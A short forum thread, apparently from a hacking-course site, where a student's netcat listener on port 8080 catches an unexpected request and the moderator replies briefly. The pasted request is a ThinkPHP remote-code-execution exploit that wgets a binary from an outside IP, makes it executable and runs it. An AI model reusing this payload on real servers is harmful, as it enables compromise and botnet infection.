Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #30026
    MJ
    Participant

    I ran the Bash command listener being nc -vv etc from m kali VM and I got back this:

    connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
    GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: /
    User-Agent: Uirusu/2.0

    sent 0, rcvd 320

    I hadn’t started the bash on any other device at this stage so very curious to know what it means? Is someone connecting to me to infiltrate instead of the other way around?

    Please help as got me a little worried.

    #30150
    Zaid SabihZaid Sabih
    Moderator

    Hello Mj,

    Which bash command are you referring to?

    #30221
    MJ
    Participant

    this is the listener for the bash being nc -vv -l -p 8080 . referenced in lecture 13.1

    Thanks,

    #30286
    Zaid SabihZaid Sabih
    Moderator

    Ok so it seems like you got a connection back, did you try running any commands after that?

Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.
Privacy Overview
ZSecurity logo featuring a stylized red letter Z

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

Strictly Necessary Cookies

Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

3rd Party Cookies

This website uses Google Analytics and Linkedin to collect anonymous information such as the number of visitors to the site, and the most popular pages.

Keeping these cookies enabled helps us to improve our website.